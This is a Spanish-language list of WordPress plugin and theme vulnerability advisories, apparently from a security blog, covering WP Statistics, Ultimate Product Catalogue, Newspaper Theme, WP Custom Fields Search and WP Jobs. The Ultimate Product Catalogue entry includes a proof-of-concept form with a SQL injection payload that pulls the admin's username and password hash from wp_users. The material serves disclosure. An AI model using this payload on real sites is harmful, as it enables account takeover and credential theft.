Vulnerabilidad Plugin: WP Statistics

Esta vulnerabilidad es causada por los datos proporcionados por el usuario. Un atacante con al menos una cuenta de suscriptor podría eliminar datos confidenciales y bajo circunstancias / configuraciones concretas puede comprometer su instalación de WordPress.   WordPress proporciona una API que permite a los desarrolladores crear contenido que los usuarios pueden inyectar a ciertas páginas con un simple código …

Vulnerabilidad Plugin: WP Statistics Más info »

Vulnerabilidad Plugin: Ultimate Product Catalogue

Tipo de acceso del usuario: Subscriber Upwards. $_POST[‘CatID’] is not escaped. Ruta: /wp-content/plugins/ultimate-product-catalogue/Functions/Process_Ajax.php Prueba de concepto <form method=»post» action=»http://target/wp-admin/admin-ajax.php?action=get_upcp_subcategories»><input type=»text» name=»CatID» value=»0 UNION SELECT user_login,user_pass FROM wp_users WHERE ID=1″><input type=»submit»>

Vulnerabilidad Theme: Newspaper Theme

Esta inyección de anuncios no es la única manera posible de explotar la vulnerabilidad de NewsPaper Theme. No sólo se puede utilizar el agujero de seguridad para inyectar más código malicioso, sino que también permite a los hackers asumir completamente la web o blog (por ejemplo, puede inyectar un script que robaría cookies de usuario administrador o permitir registros de …

Vulnerabilidad Theme: Newspaper Theme Más info »

Vulnerabilidad Plugin: WP Custom Fields Search

 ATENCIÓN: Este plugin ha sido eliminado del Repositorio Oficial de WordPress.  Esta versión del plugin WP Custom Fields Search es vulnerable debido a una vulnerabilidad de Scripting de Cross-Site Reflected en el parámetro «cs-all-0» debido a la falta de manejo de entrada adecuado de los datos del usuario. Un atacante puede ejecutar JavaScript de forma arbitraria utilizando una URL especialmente …

Vulnerabilidad Plugin: WP Custom Fields Search Más info »

Vulnerabilidad Plugin: WP Jobs

Vulnerabilidad de inyección SQL en el plugin WP Jobs 1.4 para WordPress permite a un usuario autenticado ejecutar comandos SQL arbitrarios a través del parámetro jobid.

Ir arriba